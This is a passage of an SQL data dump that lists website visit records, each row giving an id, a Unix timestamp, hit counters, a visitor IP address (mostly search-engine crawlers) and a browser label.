171.69','other'),(412432,1555156651,1,1,0,0,'5.45.207.79','other'),(412433,1555156654,1,1,0,0,'37.9.113.148','other'),(412434,1555156657,1,1,0,0,'141.8.142.38','other'),(412435,1555156664,2,2,0,0,'66.249.64.62','chrome'),(412436,1555156682,2,2,0,0,'213.180.203.9','other'),(412437,1555156714,1,1,0,0,'213.180.203.61','other'),(412438,1555156863,1,1,0,0,'178.154.171.60','other'),(412439,1555157048,1,1,0,0,'95.108.213.4','other'),(412440,1555157179,1,1,0,0,'66.249.64.31','chrome'),(412441,1555157367,1,1,0,0,'52.53.201.78','chrome'),(412442,1555157522,1,1,0,0,'79.143.39.102','chrome'),(412443,1555157741,1,1,0,0,'66.249.64.60','chrome'),(412444,1555158284,1,1,0,0,'180.163.220.5','other'),(412445,1555158553,4,4,0,0,'66.249.64.31','chrome'),(412446,1555158595,3,3,0,0,'66.249.64.29','chrome'),(412447,1555159347,1,1,0,0,'180.76.15.156','other'),(412448,1555160065,1,1,0,0,'66.249.64.29','chrome'),(412449,1555160089,1,1,0,0,'40.77.167.205','other'),(412450,1555161489,1,1,0,0,'95.108.181.94','other'),(412451,1555161499,2,2,0,0,'66.249.64.31','chrome'),(412452,1555161568,1,1,0,0,'66.249.64.60','chrome'),(412453,1555162363,3,3,0,0,'178.154.244.11','other'),(412454,1555162412,2,2,0,0,'5.45.207.79','other'),(412455,1555162506,1,1,0,0,'95.108.181.57','other'),(412456,1555162528,1,1,0,0,'178.154.171.69','other'),(412457,1555162531,1,1,0,0,'95.108.213.50','other'),(412458,1555162673,1,1,0,0,'141.8.132.16','other'),(412459,1555162825,1,1,0,0,'66.249.64.29','chrome'),(412460,1555162867,1,1,0,0,'95.108.181.83','other'),(412461,1555163327,1,1,0,0,'178.154.244.11','other'),(412462,1555163438,2,2,0,0,'66.249.64.31','chrome'),(412463,1555163529,1,1,0,0,'141.8.142.103','other'),(412464,1555164575,2,2,0,0,'66.249.64.30','chrome'),(412465,1555164624,1,1,0,0,'180.76.15.158','other'),(412466,1555165422,1,1,0,0,'178.154.244.11','other'),(412467,1555165554,1,1,0,0,'8.29.198.27','other'),(412468,1555166069,1,1,0,0,'66.249.64.31','chrome'),(412469,1555166437,1,1,0,0,'66.249.64.30','chrome'),(412470,1555166567,1,1,0,0,'8.29.198.26','other'),(412471,1555167018,1,1,0,0,'66.249.64.29','chrome'),(412472,1555167966,1,1,0,0,'66.249.64.58','chrome'),(412473,1555168115,4,4,0,0,'5.45.207.79','other'),(412474,1555168348,1,1,0,0,'5.45.207.19','other'),(412475,1555168351,1,1,0,0,'66.249.64.29','chrome'),(412476,1555168517,4,4,0,0,'178.154.244.11','other'),(412477,1555168575,2,2,0,0,'95.108.213.4','other'),(412478,1555169340,1,1,0,0,'66.249.64.29','chrome'),(412479,1555169822,2,2,0,0,'66.249.64.31','chrome'),(412480,1555169969,1,1,0,0,'66.249.64.62','chrome'),(412481,1555170204,1,1,0,0,'66.249.64.30','chrome'),(412482,1555170883,1,1,0,0,'66.249.64.60','chrome'),(412483,1555171198,1,1,0,0,'178.154.244.11','other'),(412484,1555171472,1,1,0,0,'66.249.64.30','chrome'),(412485,1555171592,1,1,0,0,'40.77.167.205','other'),(412486,1555172163,1,1,0,0,'180.76.15.137','other'),(412487,1555172942,1,1,0,0,'66.249.64.30','chrome'),(412488,1555173807,1,1,0,0,'5.45.207.79','other'),(412489,1555173902,1,1,0,0,'178.154.171.17','other'),(412490,1555174085,1,1,0,0,'87.250.224.65','other'),(412491,1555174087,1,1,0,0,'95.108.181.54','other'),(412492,1555174491,3,3,0,0,'207.46.13.126','other'),(412493,1555174497,2,2,0,0,'40.77.167.164','other'),(412494,1555174503,6,6,0,0,'40.77.167.218','other'),(412495,1555174531,8,8,0,0,'40.77.167.54','other'),(412496,1555175165,1,1,0,0,'95.108.181.57','other'),(412497,1555175342,1,1,0,0,'66.249.64.60','chrome'),(412498,1555175488,1,1,0,0,'40.77.167.164','other'),(412499,1555176228,1,1,0,0,'40.77.167.60','other'),(412500,1555176392,1,1,0,0,'8.29.198.27','other'),(412501,1555177411,1,1,0,0,'8.29.198.25','other'),(412502,1555178525,1,1,0,0,'207.46.13.126','other'),(412503,1555178527,1,1,0,0,'46.211.133.124','chrome'),(412504,1555178697,1,1,0,0,'87.250.224.65','other'),(412505,1555178720,1,1,0,0,'178.154.171.69','other'),(412506,1555178764,1,1,0,0,'141.8.132.16','other'),(412507,1555178768,1,1,0,0,'141.8.142.191','other'),(412508,1555178773,1,1,0,0,'5.255.253.16','other'),(412509,1555178776,2,2,0,0,'5.45.207.19','other'),(412510,1555178779,1,1,0,0,'87.250.224.47','other'),(412511,1555178816,2,2,0,0,'5.45.207.79','other'),(412512,1555178901,1,1,0,0,'141.8.142.103','other'),(412513,1555178984,1,1,0,0,'95.108.213.4','other'),(412514,1555179173,1,1,0,0,'178.154.244.11','other'),(412515,1555179315,1,1,0,0,'66.249.64.29','chrome'),(412516,1555179468,1,1,0,0,'66.249.64.30','chrome'),(412517,1555179502,1,1,0,0,'66.249.64.62','chrome'),(412518,1555180588,1,1,0,0,'66.249.64.31','chrome'),(412519,1555182805,2,2,0,0,'66.249.64.30','chrome'),(412520,1555182992,1,1,0,0,'37.9.113.148','other'),(412521,1555182996,1,1,0,0,'178.154.244.49','other'),(412522,1555183003,1,1,0,0,'95.108.181.83','other'),(412523,1555183006,1,1,0,0,'95.108.181.94','other'),(412524,1555183025,1,1,0,0,'157.55.39.81','other'),(412525,1555183129,1,1,0,0,'5.255.253.16','other'),(412526,1555183132,1,1,0,0,'87.250.224.99','other'),(412527,1555183184,1,1,0,0,'178.154.171.30','other'),(412528,1555183203,1,1,0,0,'141.8.142.38','other'),(412529,1555183206,1,1,0,0,'178.154.171.69','other'),(412530,1555183246,1,1,0,0,'5.45.207.76','other'),(412531,1555183302,1,1,0,0,'46.219.230.119','chrome'),(412532,1555183401,1,1,0,0,'66.249.64.29','chrome'),(412533,1555183682,1,1,0,0,'66.249.64.62','chrome'),(412534,1555184002,2,2,0,0,'40.77.167.218','other'),(412535,1555184665,1,1,0,0,'66.249.64.31','chrome'),(412536,1555184732,1,1,0,0,'157.55.39.81','other'),(412537,1555184829,1,1,0,0,'40.77.167.60','other'),(412538,1555185125,1,1,0,0,'66.249.64.29','chrome'),(412539,1555185844,1,1,0,0,'66.249.64.30','chrome'),(412540,1555185887,1,1,0,0,'141.8.142.103','other'),(412541,1555186040,1,1,0,0,'66.249.64.60','chrome'),(412542,1555186588,1,1,0,0,'40.77.167.35','other'),(412543,1555186800,1,1,0,0,'66.249.64.29','chrome'),(412544,1555187072,1,1,0,0,'40.77.167.147','other'),(412545,1555187133,1,1,0,0,'66.249.64.62','chrome'),(412546,1555187235,1,1,0,0,'8.29.198.27','other'),(412547,1555187563,1,1,0,0,'5.45.207.79','other'),(412548,1555188251,1,1,0,0,'8.29.198.25','other'),(412549,1555188534,1,1,0,0,'66.249.64.58','chrome'),(412550,1555188823,2,2,0,0,'66.249.64.30','chrome'),(412551,1555188850,1,1,0,0,'66.249.64.29','chrome'),(412552,1555189484,2,2,0,0,'207.46.13.95','other'),(412553,1555190038,1,1,0,0,'47.92.254.199','other'),(412554,1555191217,1,1,0,0,'66.249.64.60','chrome'),(412555,1555191952,1,1,0,0,'66.249.64.62','chrome'),(412556,1555192636,1,1,0,0,'178.154.171.17','other'),(412557,1555192807,1,1,0,0,'141.8.142.38','other'),(412558,1555192863,1,1,0,0,'5.45.207.79','other'),(412559,1555195055,1,1,0,0,'66.249.64.58','chrome'),(412560,1555195893,1,1,0,0,'66.249.64.29','chrome'),(412561,1555198075,1,1,0,0,'8.29.198.27','other'),(412562,1555198115,2,2,0,0,'178.154.244.11','other'),(412563,1555198187,1,1,0,0,'5.45.207.79','other'),(412564,1555198197,1,1,0,0,'141.8.142.103','other'),(412565,1555198227,1,1,0,0,'193.106.30.98','firefox'),(412566,1555198479,1,1,0,0,'87.250.224.65','other'),(412567,1555199084,1,1,0,0,'8.29.198.27','other'),(412568,1555199379,2,2,0,0,'66.249.64.30','chrome'),(412569,1555200075,1,1,0,0,'40.77.167.91','other'),(412570,1555200790,2,2,0,0,'207.46.13.2','other'),(412571,1555200825,1,1,0,0,'93.72.93.35','firefox'),(412572,1555201075,1,1,0,0,'66.249.64.29','chrome'),(412573,1555201909,1,1,0,0,'157.55.39.101','other'),(412574,1555204672,4,4,0,0,'5.45.207.19','other'),(412575,1555204731,1,1,0,0,'5.45.207.79','other'),(412576,1555204791,1,1,0,0,'95.108.213.4','other'),(412577,1555205540,1,1,0,0,'207.46.13.225','other'),(412578,1555205546,1,1,0,0,'157.55.39.101','other'),(412579,1555205615,1,1,0,0,'109.201.154.211','other'),(412580,1555205730,1,1,0,0,'95.108.213.4','other'),(412581,1555205874,2,2,0,0,'66.249.64.30','chrome'),(412582,1555205891,1,1,0,0,'207.46.13.175','other'),(412583,1555206601,1,1,0,0,'66.249.64.31','chrome'),(412584,1555208921,1,1,0,0,'8.29.198.26','other'),(412585,1555209919,1,1,0,0,'8.29.198.26','other'),(412586,1555210340,2,2,0,0,'34.221.81.140','chrome'),(412587,1555211851,1,1,0,0,'95.108.181.54','other'),(412588,1555211965,1,1,0,0,'87.250.224.99','other'),(412589,1555211971,1,1,0,0,'13.66.139.0','other'),(412590,1555212001,1,1,0,0,'178.154.171.30','other'),(412591,1555212123,1,1,0,0,'95.108.213.50','other'),(412592,1555212286,1,1,0,0,'37.9.113.148','other'),(412593,1555212337,2,2,0,0,'87.250.224.47','other'),(412594,1555212409,1,1,0,0,'141.8.142.103','other'),(412595,1555212575,1,1,0,0,'5.255.253.16','other'),(412596,1555212695,1,1,0,0,'178.154.244.11','other'),(412597,1555212765,1,1,0,0,'87.250.224.65','other'),(412598,1555212820,1,1,0,0,'66.249.64.30','chrome'),(412599,1555213028,1,1,0,0,'5.255.253.22','other'),(412600,1555213031,1,1,0,0,'213.180.203.40','other'),(412601,1555213192,1,1,0,0,'207.46.13.222','other'),(412602,1555213741,1,1,0,0,'207.46.13.221','other'),(412603,1555215326,1,1,0,0,'82.145.211.4','other'),(412604,1555215576,1,1,0,0,'207.46.13.222','other'),(412605,1555217240,1,1,0,0,'178.154.244.11','other'),(412606,1555217241,1,1,0,0,'5.45.207.79','other'),(412607,1555217693,1,1,0,0,'40.77.167.151','other'),(412608,1555219443,1,1,0,0,'185.220.101.58','other'),(412609,1555219761,1,1,0,0,'8.29.198.26','other'),(412610,1555220072,3,3,0,0,'87.250.224.47','other'),(412611,1555220157,3,3,0,0,'5.45.207.79','other'),(412612,1555220279,9,9,0,0,'5.45.207.19','other'),(412613,1555220298,3,3,0,0,'141.8.142.103','other'),(412614,1555220605,1,1,0,0,'46.211.100.251','chrome'),(412615,1555220757,1,1,0,0,'8.29.198.25','other'),(412616,1555220772,1,1,0,0,'178.154.244.11','other'),(412617,1555220881,2,2,0,0,'66.249.64.29','chrome'),(412618,1555222464,3,3,0,0,'66.249.64.29','chrome'),(412619,1555223481,2,2,0,0,'66.249.64.30','chrome'),(412620,1555223831,1,1,0,0,'66.249.64.31','chrome'),(412621,1555224078,1,1,0,0,'178.154.244.21','other'),(412622,1555224086,1,1,0,0,'141.8.142.191','other'),(412623,1555224932,1,1,0,0,'66.249.64.30','chrome'),(412624,1555225450,1,1,0,0,'66.249.64.58','chrome'),(412625,1555225593,1,1,0,0,'66.249.64.31','chrome'),(412626,1555225652,1,1,0,0,'66.249.64.29','chrome'),(412627,1555226149,1,1,0,0,'5.255.253.16','other'),(412628,1555226688,3,3,0,0,'66.249.64.31','chrome'),(412629,1555226712,1,1,0,0,'66.249.64.29','chrome'),(412630,1555227259,1,1,0,0,'66.249.64.30','chrome'),(412631,1555227414,1,1,0,0,'66.249.64.58','chrome'),(412632,1555227724,1,1,0,0,'40.77.167.151','other'),(412633,1555228074,1,1,0,0,'66.249.64.29','chrome'),(412634,1555228574,1,1,0,0,'66.249.64.30','chrome'),(412635,1555229096,1,1,0,0,'66.249.64.58','chrome'),(412636,1555229150,1,1,0,0,'180.76.15.161','other'),(412637,1555229208,2,2,0,0,'5.45.207.19','other'),(412638,1555229503,1,1,0,0,'66.249.64.60','chrome'),(412639,1555229676,2,2,0,0,'66.249.64.31','chrome'),(412640,1555230341,1,1,0,0,'66.249.64.58','chrome'),(412641,1555230598,1,1,0,0,'8.29.198.25','other'),(412642,1555231068,1,1,0,0,'130.180.220.223','chrome'),(412643,1555231085,2,2,0,0,'66.249.64.30','chrome'),(412644,1555231103,1,1,0,0,'141.8.142.103','other'),(412645,1555231199,1,1,0,0,'5.45.207.79','other'),(412646,1555231290,1,1,0,0,'5.45.207.19','other'),(412647,1555231296,1,1,0,0,'95.108.213.4','other'),(412648,1555231598,1,1,0,0,'8.29.198.27','other'),(412649,1555232102,1,1,0,0,'5.45.207.79','other'),(412650,1555232363,1,1,0,0,'109.74.154.72','chrome'),(412651,1555232775,1,1,0,0,'66.249.64.60','chrome'),(412652,1555233143,1,1,0,0,'207.46.13.222','other'),(412653,1555233221,1,1,0,0,'66.249.64.30','chrome'),(412654,1555233589,1,1,0,0,'66.249.64.29','chrome'),(412655,1555233779,1,1,0,0,'40.77.167.152','other'),(412656,1555234411,1,1,0,0,'40.77.167.41','other'),(412657,1555234934,1,1,0,0,'66.249.64.29','chrome'),(412658,1555235319,1,1,0,0,'46.133.47.2','chrome'),(412659,1555235721,1,1,0,0,'40.77.167.152','other'),(412660,1555236178,1,1,0,0,'217.69.143.54','other'),(412661,1555236547,2,2,0,0,'66.249.64.31','chrome'),(412662,1555236773,2,2,0,0,'66.249.64.30','chrome'),(412663,1555237646,1,1,0,0,'123.126.113.161','other'),(412664,1555238837,1,1,0,0,'66.249.64.30','chrome'),(412665,1555238948,1,1,0,0,'66.249.64.31','chrome'),(412666,1555239638,1,1,0,0,'95.163.255.93','other'),(412667,1555239643,1,1,0,0,'95.163.255.92','other'),(412668,1555239694,1,1,0,0,'40.77.167.152','other'),(412669,1555239900,1,1,0,0,'66.249.64.60','chrome'),(412670,1555240587,1,1,0,0,'66.249.64.31','chrome'),(412671,1555240844,1,1,0,0,'207.46.13.123','other'),(412672,1555241253,1,1,0,0,'66.249.64.30','chrome'),(412673,1555241433,1,1,0,0,'8.29.198.27','other'),(412674,1555241858,1,1,0,0,'109.173.64.217','chrome'),(412675,1555241887,1,1,0,0,'5.3.176.190','chrome'),(412676,1555242257,1,1,0,0,'141.8.142.191','other'),(412677,1555242342,1,1,0,0,'178.154.171.17','other'),(412678,1555242437,1,1,0,0,'8.29.198.27','other'),(412679,1555242662,2,2,0,0,'178.154.200.8','other'),(412680,1555242664,1,1,0,0,'5.45.207.76','other'),(412681,1555242953,1,1,0,0,'157.55.39.85','other'),(412682,1555242982,1,1,0,0,'213.180.203.61','other'),(412683,1555243101,1,1,0,0,'40.77.167.152','other'),(412684,1555243185,1,1,0,0,'5.255.253.16','other'),(412685,1555243266,1,1,0,0,'40.77.167.41','other'),(412686,1555243276,1,1,0,0,'66.249.64.30','chrome'),(412687,1555243291,1,1,0,0,'95.108.213.4','other'),(412688,1555243339,1,1,0,0,'5.255.253.25','other'),(412689,1555243481,1,1,0,0,'157.55.39.241','other'),(412690,1555243559,1,1,0,0,'178.154.244.11','other'),(412691,1555243563,1,1,0,0,'95.108.181.54','other'),(412692,1555243591,3,3,0,0,'141.8.142.191','other'),(412693,1555243819,1,1,0,0,'66.249.64.29','chrome'),(412694,1555243854,1,1,0,0,'87.250.224.99','other'),(412695,1555244600,1,1,0,0,'157.55.39.85','other'),(412696,1555244935,1,1,0,0,'46.211.39.153','firefox'),(412697,1555245001,1,1,0,0,'178.154.171.69','other'),(412698,1555245531,1,1,0,0,'66.249.64.29','chrome'),(412699,1555246964,1,1,0,0,'207.46.13.123','other'),(412700,1555246974,1,1,0,0,'157.55.39.85','other'),(412701,1555247234,1,1,0,0,'40.77.167.41','other'),(412702,1555247368,2,2,0,0,'66.249.64.60','chrome'),(412703,1555247614,1,1,0,0,'66.249.64.30','chrome'),(412704,1555248472,1,1,0,0,'93.72.228.227','firefox'),(412705,1555248564,1,1,0,0,'157.55.39.241','other'),(412706,1555249022,1,1,0,0,'180.76.15.147','other'),(412707,1555249798,1,1,0,0,'66.249.64.29','chrome'),(412708,1555249929,1,1,0,0,'66.249.64.30','chrome'),(412709,1555250693,1,1,0,0,'207.46.13.178','other'),(412710,1555251447,3,3,0,0,'66.249.64.31','chrome'),(412711,1555251514,1,1,0,0,'91.209.11.236','other'),(412712,1555251633,1,1,0,0,'66.249.64.30','chrome'),(412713,1555251872,1,1,0,0,'207.46.13.178','other'),(412714,1555252284,1,1,0,0,'8.29.198.25','other'),(412715,1555252580,1,1,0,0,'66.102.9.58','chrome'),(412716,1555252653,1,1,0,0,'207.46.13.123','other'),(412717,1555252673,1,1,0,0,'207.46.13.219','other'),(412718,1555253016,2,2,0,0,'178.154.171.69','other'),(412719,1555253123,1,1,0,0,'157.55.39.85','other'),(412720,1555253168,2,2,0,0,'87.250.224.107','other'),(412721,1555253274,1,1,0,0,'8.29.198.26','other'),(412722,1555253471,2,2,0,0,'178.154.244.11','other'),(412723,1555253546,1,1,0,0,'178.154.200.8','other'),(412724,1555253614,1,1,0,0,'66.249.64.30','chrome'),(412725,1555253616,1,1,0,0,'66.249.64.31','chrome'),(412726,1555253675,2,2,0,0,'5.255.253.22','other'),(412727,1555253692,1,1,0,0,'66.249.64.29','chrome'),(412728,1555253866,1,1,0,0,'141.8.142.191','other'),(412729,1555253869,1,1,0,0,'213.180.203.23','other'),(412730,1555253934,2,2,0,0,'213.180.203.48','other'),(412731,1555254251,2,2,0,0,'157.55.39.85','other'),(412732,1555254435,1,1,0,0,'13.57.233.99','chrome'),(412733,1555254496,1,1,0,0,'87.250.224.99','other'),(412734,1555254561,1,1,0,0,'37.9.113.38','other'),(412735,1555254579,1,1,0,0,'87.250.224.47','other'),(412736,1555254686,1,1,0,0,'141.8.132.16','other'),(412737,1555254931,1,1,0,0,'178.154.244.21','other'),(412738,1555255241,1,1,0,0,'95.108.181.83','other'),(412739,1555256182,2,2,0,0,'66.249.64.31','chrome'),(412740,1555256420,1,1,0,0,'95.163.255.94','other'),(412741,1555256445,2,2,0,0,'66.249.64.29','chrome'),(412742,1555256733,2,2,0,0,'207.46.13.178','other'),(412743,1555256898,1,1,0,0,'178.154.244.21','other'),(412744,1555257701,1,1,0,0,'113.35.251.98','chrome'),(412745,1555258167,1,1,0,0,'66.249.64.30','chrome'),(412746,1555258181,2,2,0,0,'66.249.64.29','chrome'),(412747,1555258510,1,1,0,0,'66.249.64.31','chrome'),(412748,1555258526,1,1,0,0,'66.249.64.58','chrome'),(412749,1555259096,1,1,0,0,'66.249.64.30','chrome'),(412750,1555259816,3,3,0,0,'207.46.13.219','other'),(412751,1555259875,1,1,0,0,'40.77.167.222','other'),(412752,1555259973,1,1,0,0,'157.55.39.85','other'),(412753,1555260670,1,1,0,0,'95.163.255.94','other'),(412754,1555261619,2,2,0,0,'207.46.13.178','other'),(412755,1555261722,1,1,0,0,'91.196.178.189','chrome'),(412756,1555261791,1,1,0,0,'66.249.64.31','chrome'),(412757,1555263053,1,1,0,0,'207.46.13.178','other'),(412758,1555263126,1,1,0,0,'8.29.198.26','other'),(412759,1555263515,1,1,0,0,'213.180.203.23','other'),(412760,1555263528,1,1,0,0,'5.45.207.19','other'),(412761,1555264057,1,1,0,0,'207.46.13.178','other'),(412762,1555264114,1,1,0,0,'8.29.198.26','other'),(412763,1555264273,1,1,0,0,'66.249.64.31','chrome'),(412764,1555264303,1,1,0,0,'40.77.167.222','other'),(412765,1555264403,1,1,0,0,'66.249.64.60','chrome'),(412766,1555264616,1,1,0,0,'141.8.142.38','other'),(412767,1555266473,6,6,0,0,'66.249.83.30','chrome'),(412768,1555266480,6,6,0,0,'66.249.83.26','chrome'),(412769,1555266818,1,1,0,0,'95.134.152.23','chrome'),(412770,1555267202,1,1,0,0,'95.163.255.96','other'),(412771,1555268468,1,1,0,0,'157.55.39.255','other'),(412772,1555268476,1,1,0,0,'40.77.167.57','other'),(412773,1555268520,1,1,0,0,'66.249.64.62','chrome'),(412774,1555268656,2,2,0,0,'66.249.64.30','chrome'),(412775,1555268678,1,1,0,0,'66.249.64.29','chrome'),(412776,1555269232,1,1,0,0,'207.46.13.178','other'),(412777,1555270331,1,1,0,0,'46.219.206.207','chrome'),(412778,1555271071,1,1,0,0,'109.86.145.179','chrome'),(412779,1555271831,1,1,0,0,'176.105.197.45','chrome'),(412780,1555272021,2,2,0,0,'66.249.64.30','chrome'),(412781,1555272750,1,1,0,0,'40.77.167.57','other'),(412782,1555272756,1,1,0,0,'66.249.64.31','chrome'),(412783,1555272943,2,2,0,0,'66.249.64.29','chrome'),(412784,1555273240,1,1,0,0,'5.45.207.80','other'),(412785,1555273241,1,1,0,0,'178.154.244.11','other'),(412786,1555273433,1,1,0,0,'207.46.13.8','other'),(412787,1555273965,1,1,0,0,'8.29.198.25','other'),(412788,1555274132,1,1,0,0,'93.158.166.7','other'),(412789,1555274147,2,2,0,0,'95.108.213.4','other'),(412790,1555274151,1,1,0,0,'141.8.142.144','other'),(412791,1555274185,1,1,0,0,'40.77.167.57','other'),(412792,1555274327,2,2,0,0,'31.41.93.55','other'),(412793,1555274374,1,1,0,0,'31.13.115.5','other'),(412794,1555274378,1,1,0,0,'31.13.115.8','other'),(412795,1555274385,1,1,0,0,'31.13.115.7','other'),(412796,1555274386,1,1,0,0,'31.13.115.19','other'),(412797,1555274491,4,4,0,0,'66.249.64.29','chrome'),(412798,1555274512,3,3,0,0,'66.249.64.62','chrome'),(412799,1555274743,2,2,0,0,'66.249.64.30','chrome'),(412800,1555274835,1,1,0,0,'141.8.142.103','other'),(412801,1555274933,1,1,0,0,'141.8.142.162','other'),(412802,1555274964,1,1,0,0,'8.29.198.25','other'),(412803,1555275237,1,1,0,0,'207.46.13.22','other'),(412804,1555275281,1,1,0,0,'66.249.64.31','chrome'),(412805,1555275431,1,1,0,0,'93.158.166.7','other'),(412806,1555275458,1,1,0,0,'5.255.253.25','other'),(412807,1555275705,1,1,0,0,'178.154.200.8','other'),(412808,1555276007,1,1,0,0,'66.249.64.60','chrome'),(412809,1555276121,1,1,0,0,'207.46.13.8','other'),(412810,1555276213,1,1,0,0,'31.41.93.55','chrome'),(412811,1555276328,1,1,0,0,'37.53.231.65','chrome'),(412812,1555276343,1,1,0,0,'42.236.10.78','other'),(412813,1555276376,1,1,0,0,'42.236.10.93','other'),(412814,1555276710,1,1,0,0,'66.249.64.31','chrome'),(412815,1555277340,1,1,0,0,'95.163.255.98','other'),(412816,1555277431,1,1,0,0,'40.77.167.48','other'),(412817,1555278339,1,1,0,0,'180.76.15.142','other'),(412818,1555278722,1,1,0,0,'66.249.64.31','chrome'),(412819,1555280586,1,1,0,0,'5.45.207.80','other'),(412820,1555280682,1,1,0,0,'157.55.39.78','other'),(412821,1555280828,3,3,0,0,'66.249.64.62','chrome'),(412822,1555281051,2,2,0,0,'66.249.64.30','chrome'),(412823,1555281187,1,1,0,0,'40.77.167.157','other'),(412824,1555281552,1,1,0,0,'91.209.11.236','other'),(412825,1555281756,1,1,0,0,'40.77.167.144','other'),(412826,1555282225,1,1,0,0,'66.249.64.31','chrome'),(412827,1555282881,1,1,0,0,'91.209.11.236','other'),(412828,1555283008,1,1,0,0,'5.45.207.79','other'),(412829,1555283032,1,1,0,0,'95.163.255.96','other'),(412830,1555283068,1,1,0,0,'66.249.64.60','chrome'),(412831,1555283097,1,1,0,0,'87.250.224.65','other'),(412832,1555283131,2,2,0,0,'178.154.244.11','other'),(412833,1555283243,1,1,0,0,'207.46.13.8','other'),(412834,1555283442,1,1,0,0,'66.249.64.62','chrome'),(412835,1555283768,1,1,0,0,'141.8.132.16','other'),(412836,1555283798,1,1,0,0,'213.180.203.40','other'),(412837,1555284349,1,1,0,0,'66.249.64.62','chrome'),(412838,1555284613,1,1,0,0,'66.249.64.29','chrome'),(412839,1555284814,1,1,0,0,'8.29.198.25','other'),(412840,1555285811,1,1,0,0,'8.29.198.26','other'),(412841,1555287095,2,2,0,0,'66.249.64.30','chrome'),(412842,1555287375,1,1,0,0,'141.8.142.103','other'),(412843,1555287683,1,1,0,0,'178.154.244.11','other'),(412844,1555287855,2,2,0,0,'66.249.64.29','chrome'),(412845,1555288006,2,2,0,0,'66.249.64.31','chrome'),(412846,1555288304,2,2,0,0,'66.249.64.30','chrome'),(412847,1555288728,1,1,0,0,'95.163.255.93','other'),(412848,1555289816,1,1,0,0,'207.46.13.8','other'),(412849,1555289826,4,4,0,0,'66.249.64.31','chrome'),(412850,1555290112,4,4,0,0,'66.249.64.30','chrome'),(412851,1555290312,1,1,0,0,'66.249.64.29','chrome'),(412852,1555290779,1,1,0,0,'40.77.167.190','other'),(412853,1555291002,1,1,0,0,'207.46.13.8','other'),(412854,1555292021,1,1,0,0,'66.249.64.58','chrome'),(412855,1555292041,2,2,0,0,'66.249.64.29','chrome'),(412856,1555292063,2,2,0,0,'66.249.64.30','chrome'),(412857,1555292141,5,5,0,0,'178.154.244.11','other'),(412858,1555292699,1,1,0,0,'87.250.224.47','other'),(412859,1555292885,1,1,0,0,'40.77.167.99','other'),(412860,1555293066,1,1,0,0,'178.154.244.11','other'),(412861,1555293163,2,2,0,0,'5.45.207.79','other'),(412862,1555293862,1,1,0,0,'66.249.64.30','chrome'),(412863,1555293880,1,1,0,0,'66.249.64.29','chrome'),(412864,1555293882,1,1,0,0,'40.77.167.37','other'),(412865,1555294203,1,1,0,0,'207.46.13.8','other'),(412866,1555294229,1,1,0,0,'95.163.255.96','other'),(412867,1555294451,1,1,0,0,'66.249.64.31','chrome'),(412868,1555294850,1,1,0,0,'5.45.207.79','other'),(412869,1555294904,1,1,0,0,'66.249.64.58','chrome'),(412870,1555295147,1,1,0,0,'66.249.64.60','chrome'),(412871,1555295653,1,1,0,0,'8.29.198.25','other'),(412872,1555295846,2,2,0,0,'66.249.64.30','chrome'),(412873,1555296064,1,1,0,0,'40.77.167.37','other'),(412874,1555296321,2,2,0,0,'13.66.139.0','other'),(412875,1555296601,2,2,0,0,'66.249.64.31','chrome'),(412876,1555296642,1,1,0,0,'8.29.198.25','other'),(412877,1555297158,2,2,0,0,'34.212.17.65','chrome'),(412878,1555297465,1,1,0,0,'66.249.64.30','chrome'),(412879,1555297729,1,1,0,0,'66.249.64.29','chrome'),(412880,1555298012,2,2,0,0,'157.55.39.210','other'),(412881,1555299805,2,2,0,0,'66.249.64.31','chrome'),(412882,1555300865,2,2,0,0,'5.45.207.79','other'),(412883,1555300968,2,2,0,0,'178.154.244.11','other'),(412884,1555301420,1,1,0,0,'40.77.167.148','other'),(412885,1555301553,1,1,0,0,'5.188.210.44','chrome'),(412886,1555301613,1,1,0,0,'157.55.39.222','other'),(412887,1555302247,1,1,0,0,'66.249.64.29','chrome'),(412888,1555302522,1,1,0,0,'66.249.64.62','chrome'),(412889,1555302697,1,1,0,0,'66.249.64.31','chrome'),(412890,1555302905,1,1,0,0,'40.77.167.148','other'),(412891,1555303511,1,1,0,0,'207.46.13.121','other'),(412892,1555303852,1,1,0,0,'180.76.15.149','other'),(412893,1555304497,1,1,0,0,'13.66.139.0','other'),(412894,1555304698,1,1,0,0,'66.249.64.60','chrome'),(412895,1555304931,1,1,0,0,'91.196.179.134','chrome'),(412896,1555305886,1,1,0,0,'104.148.64.26','chrome'),(412897,1555305997,1,1,0,0,'185.220.101.3','other'),(412898,1555306509,1,1,0,0,'8.29.198.26','other'),(412899,1555307473,1,1,0,0,'8.29.198.27','other'),(412900,1555308299,2,2,0,0,'66.249.64.31','chrome'),(412901,1555308324,1,1,0,0,'66.249.64.30','chrome'),(412902,1555308443,1,1,0,0,'66.249.64.62','chrome'),(412903,1555308895,1,1,0,0,'91.196.179.134','chrome'),(412904,1555309896,2,2,0,0,'5.45.207.79','other'),(412905,1555309901,2,2,0,0,'87.250.224.47','other'),(412906,1555309910,2,2,0,0,'95.108.213.4','other'),(412907,1555310043,1,1,0,0,'141.8.142.103','other'),(412908,1555310047,1,1,0,0,'157.55.39.210','other'),(412909,1555310556,2,2,0,0,'66.249.64.31','chrome'),(412910,1555310662,2,2,0,0,'66.249.64.29','chrome'),(412911,1555310801,3,3,0,0,'66.249.64.30','chrome'),(412912,1555310884,1,1,0,0,'60.191.38.77','firefox'),(412913,1555311514,2,2,0,0,'66.249.64.31','chrome'),(412914,1555311590,1,1,0,0,'91.124.182.170','firefox'),(412915,1555311635,1,1,0,0,'66.249.64.58','chrome'),(412916,1555311815,1,1,0,0,'91.196.178.87','chrome'),(412917,1555311949,1,1,0,0,'66.249.64.60','chrome'),(412918,1555312071,1,1,0,0,'95.163.255.95','other'),(412919,1555312310,3,3,0,0,'66.249.64.30','chrome'),(412920,1555313022,1,1,0,0,'195.10.210.70','chrome'),(412921,1555313410,1,1,0,0,'66.249.64.30','chrome'),(412922,1555313604,1,1,0,0,'91.196.178.99','chrome'),(412923,1555313671,1,1,0,0,'60.191.38.77','firefox'),(412924,1555313765,1,1,0,0,'66.249.64.31','chrome'),(412925,1555314006,1,1,0,0,'37.9.113.148','other'),(412926,1555314071,2,2,0,0,'66.249.64.29','chrome'),(412927,1555314134,1,1,0,0,'66.249.64.60','chrome'),(412928,1555314568,1,1,0,0,'91.196.178.87','chrome'),(412929,1555314674,1,1,0,0,'207.46.13.207','other'),(412930,1555315097,1,1,0,0,'66.249.64.30','chrome'),(412931,1555315288,1,1,0,0,'66.249.64.62','chrome'),(412932,1555315479,1,1,0,0,'157.55.39.210','other'),(412933,1555315752,1,1,0,0,'207.46.13.207','other'),(412934,1555315888,1,1,0,0,'37.52.121.188','chrome'),(412935,